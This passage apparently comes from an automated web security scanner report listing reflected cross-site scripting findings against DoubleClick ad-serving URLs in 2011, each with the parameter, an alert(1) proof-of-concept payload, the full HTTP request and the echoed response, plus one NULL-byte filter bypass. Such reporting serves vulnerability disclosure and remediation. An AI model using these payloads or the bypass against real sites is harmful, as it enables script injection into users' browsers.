GET /adj/N5798.133090.8212946998421/B5576949.26;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=465483413437812717&mt_id=118747&mt_adid=53&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530c79bd"-alert(1)-"583b910f332&redirect=;ord=465483413437812717? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHACWPZQAAAAAAOELJQAAAAAAAgBUAAIAAAAAAP8AAAACF3MOLwAAAAAAGY8fAAAAAAB2lTAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAO7v8bGEPwAAAAAAAAAAAADu7.GxhD8AAAAAAAAAAAAA7u.xsYQ.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALGWkhbC9SCtJxH-42GDAVsa-ERu6Kir4jHXVHAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3750261103%26r%3D0%26s%3D1887835,067bb6d0-a137-11e0-92ba-abc7ee1a23f8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5976
Date: Tue, 28 Jun 2011 03:32:24 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue May 31 08:48:20 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0%3B0%3B64814706%3B4307-300/250%3B42417319/42435106/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=465483413437812717&mt_id=118747&mt_adid=53&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530c79bd"-alert(1)-"583b910f332&redirect=http%3a%2f%2fwww.waterdeliveryoffers.com/gateway.cfm%3Facode%3DBAAAAA0N000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptacces
...[SNIP]...

1.124. http://ad.doubleclick.net/adj/N5798.133090.8212946998421/B5576949.26 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5798.133090.8212946998421/B5576949.26

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70284"-alert(1)-"c4ab2baee7c was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5798.133090.8212946998421/B5576949.26;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=465483413437812717&mt_id=118747&mt_adid=53&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=70284"-alert(1)-"c4ab2baee7c HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHACWPZQAAAAAAOELJQAAAAAAAgBUAAIAAAAAAP8AAAACF3MOLwAAAAAAGY8fAAAAAAB2lTAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAO7v8bGEPwAAAAAAAAAAAADu7.GxhD8AAAAAAAAAAAAA7u.xsYQ.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALGWkhbC9SCtJxH-42GDAVsa-ERu6Kir4jHXVHAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3750261103%26r%3D0%26s%3D1887835,067bb6d0-a137-11e0-92ba-abc7ee1a23f8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5976
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 03:32:41 GMT
Expires: Tue, 28 Jun 2011 03:32:41 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue May 31 08:48:20 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
814706%3B4307-300/250%3B42417319/42435106/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=465483413437812717&mt_id=118747&mt_adid=53&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=70284"-alert(1)-"c4ab2baee7chttp%3a%2f%2fwww.waterdeliveryoffers.com/gateway.cfm%3Facode%3DBAAAAA0N000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never
...[SNIP]...

1.125. http://ad.doubleclick.net/adj/N5798.133090.8212946998421/B5576949.26 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5798.133090.8212946998421/B5576949.26

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afcf2"-alert(1)-"63efab65b02 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5798.133090.8212946998421/B5576949.26;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=465483413437812717afcf2"-alert(1)-"63efab65b02&mt_id=118747&mt_adid=53&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=;ord=465483413437812717? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHACWPZQAAAAAAOELJQAAAAAAAgBUAAIAAAAAAP8AAAACF3MOLwAAAAAAGY8fAAAAAAB2lTAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAO7v8bGEPwAAAAAAAAAAAADu7.GxhD8AAAAAAAAAAAAA7u.xsYQ.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALGWkhbC9SCtJxH-42GDAVsa-ERu6Kir4jHXVHAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3750261103%26r%3D0%26s%3D1887835,067bb6d0-a137-11e0-92ba-abc7ee1a23f8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5976
Date: Tue, 28 Jun 2011 03:31:26 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue May 31 08:48:20 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/a7/%2a/u%3B242057942%3B0-0%3B0%3B64814706%3B4307-300/250%3B42417319/42435106/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=465483413437812717afcf2"-alert(1)-"63efab65b02&mt_id=118747&mt_adid=53&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.waterdeliveryoffers.com/gateway.cfm%3Facode%3DBAAAAA0N000");
var fscUrl = url;
var fscUrlClickTagFound
...[SNIP]...

1.126. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B5269038.26 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B5269038.26

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a3ba'-alert(1)-'01b7f7cedad was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B5269038.26;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=29076741809768234&mt_id=112750&mt_adid=1004485a3ba'-alert(1)-'01b7f7cedad&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=;ord=29076741809768234? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAB3q4kAAAAAADj7IwAAAAAAAgCQAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAABvNi8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAABhfzqORPwAAAAAAAAAAAAAYX86jkT8AAAAAAAAAAAAAGF.Oo5E.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACykLseqSZSCtYjsbVIbE5glYOCAAQkRei5Lm.wAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D472948958%26r%3D0%26s%3D1887835,cd24f8e2-a131-11e0-b3de-1374d41da03c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6016
Date: Tue, 28 Jun 2011 02:54:41 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Wed Apr 13 09:46:26 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
%3Bh%3Dv8/3b34/f/aa/%2a/g%3B240570459%3B0-0%3B0%3B61251276%3B4307-300/250%3B41111994/41129781/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=29076741809768234&mt_id=112750&mt_adid=1004485a3ba'-alert(1)-'01b7f7cedad&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.nylaarp.com/694\">
...[SNIP]...

1.127. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B5269038.26 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B5269038.26

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0036e76"-alert(1)-"c692859c262 was submitted in the mt_adid parameter. This input was echoed as 36e76"-alert(1)-"c692859c262 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B5269038.26;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=29076741809768234&mt_id=112750&mt_adid=100448%0036e76"-alert(1)-"c692859c262&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=;ord=29076741809768234? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAB3q4kAAAAAADj7IwAAAAAAAgCQAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAABvNi8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAABhfzqORPwAAAAAAAAAAAAAYX86jkT8AAAAAAAAAAAAAGF.Oo5E.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACykLseqSZSCtYjsbVIbE5glYOCAAQkRei5Lm.wAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D472948958%26r%3D0%26s%3D1887835,cd24f8e2-a131-11e0-b3de-1374d41da03c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6028
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 02:54:37 GMT
Expires: Tue, 28 Jun 2011 02:54:37 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Wed Apr 13 09:46:26 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
h%3Dv8/3b34/f/ad/%2a/g%3B240570459%3B0-0%3B0%3B61251276%3B4307-300/250%3B41111994/41129781/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=29076741809768234&mt_id=112750&mt_adid=100448%0036e76"-alert(1)-"c692859c262&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.nylaarp.com/694");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscr
...[SNIP]...

1.128. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B5269038.26 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B5269038.26

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c83d2'-alert(1)-'90040ac53db was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B5269038.26;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=29076741809768234&mt_id=112750c83d2'-alert(1)-'90040ac53db&mt_adid=100448&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=;ord=29076741809768234? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAB3q4kAAAAAADj7IwAAAAAAAgCQAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAABvNi8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAABhfzqORPwAAAAAAAAAAAAAYX86jkT8AAAAAAAAAAAAAGF.Oo5E.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACykLseqSZSCtYjsbVIbE5glYOCAAQkRei5Lm.wAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D472948958%26r%3D0%26s%3D1887835,cd24f8e2-a131-11e0-b3de-1374d41da03c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 472
Date: Tue, 28 Jun 2011 02:54:16 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b34/c/aa/%2a/e;240570459;1-0;0;61251276;4307-300/250;41112510/41130297/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=29076741809768234&mt_id=112750c83d2'-alert(1)-'90040ac53db&mt_adid=100448&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.nylaarp.com/694">
...[SNIP]...

1.129. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B5269038.26 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B5269038.26

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d2cd'-alert(1)-'e6902756722 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B5269038.26;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=29076741809768234&mt_id=112750&mt_adid=100448&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c3065308d2cd'-alert(1)-'e6902756722&redirect=;ord=29076741809768234? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAB3q4kAAAAAADj7IwAAAAAAAgCQAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAABvNi8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAABhfzqORPwAAAAAAAAAAAAAYX86jkT8AAAAAAAAAAAAAGF.Oo5E.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACykLseqSZSCtYjsbVIbE5glYOCAAQkRei5Lm.wAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D472948958%26r%3D0%26s%3D1887835,cd24f8e2-a131-11e0-b3de-1374d41da03c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6016
Date: Tue, 28 Jun 2011 02:55:12 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Wed Apr 13 09:46:26 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
B0%3B61251276%3B4307-300/250%3B41111994/41129781/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=29076741809768234&mt_id=112750&mt_adid=100448&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c3065308d2cd'-alert(1)-'e6902756722&redirect=http%3a%2f%2fwww.nylaarp.com/694\">
...[SNIP]...

1.130. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B5269038.26 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B5269038.26

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7251'-alert(1)-'2917f9be78f was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B5269038.26;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=29076741809768234&mt_id=112750&mt_adid=100448&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=a7251'-alert(1)-'2917f9be78f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAB3q4kAAAAAADj7IwAAAAAAAgCQAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAABvNi8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAABhfzqORPwAAAAAAAAAAAAAYX86jkT8AAAAAAAAAAAAAGF.Oo5E.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACykLseqSZSCtYjsbVIbE5glYOCAAQkRei5Lm.wAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D472948958%26r%3D0%26s%3D1887835,cd24f8e2-a131-11e0-b3de-1374d41da03c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6016
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 02:55:32 GMT
Expires: Tue, 28 Jun 2011 02:55:32 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Wed Apr 13 09:46:26 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
276%3B4307-300/250%3B41111994/41129781/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=29076741809768234&mt_id=112750&mt_adid=100448&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=a7251'-alert(1)-'2917f9be78fhttp%3a%2f%2fwww.nylaarp.com/694\">
...[SNIP]...

1.131. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B5269038.26 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B5269038.26

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dca11'-alert(1)-'054d5ab12e9 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B5269038.26;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=29076741809768234dca11'-alert(1)-'054d5ab12e9&mt_id=112750&mt_adid=100448&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=;ord=29076741809768234? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAB3q4kAAAAAADj7IwAAAAAAAgCQAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAABvNi8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAABhfzqORPwAAAAAAAAAAAAAYX86jkT8AAAAAAAAAAAAAGF.Oo5E.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACykLseqSZSCtYjsbVIbE5glYOCAAQkRei5Lm.wAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D472948958%26r%3D0%26s%3D1887835,cd24f8e2-a131-11e0-b3de-1374d41da03c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6016
Date: Tue, 28 Jun 2011 02:54:01 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Wed Apr 13 09:46:26 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
p://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/aa/%2a/g%3B240570459%3B0-0%3B0%3B61251276%3B4307-300/250%3B41111994/41129781/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=29076741809768234dca11'-alert(1)-'054d5ab12e9&mt_id=112750&mt_adid=100448&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.nylaarp.com/694\">
...[SNIP]...

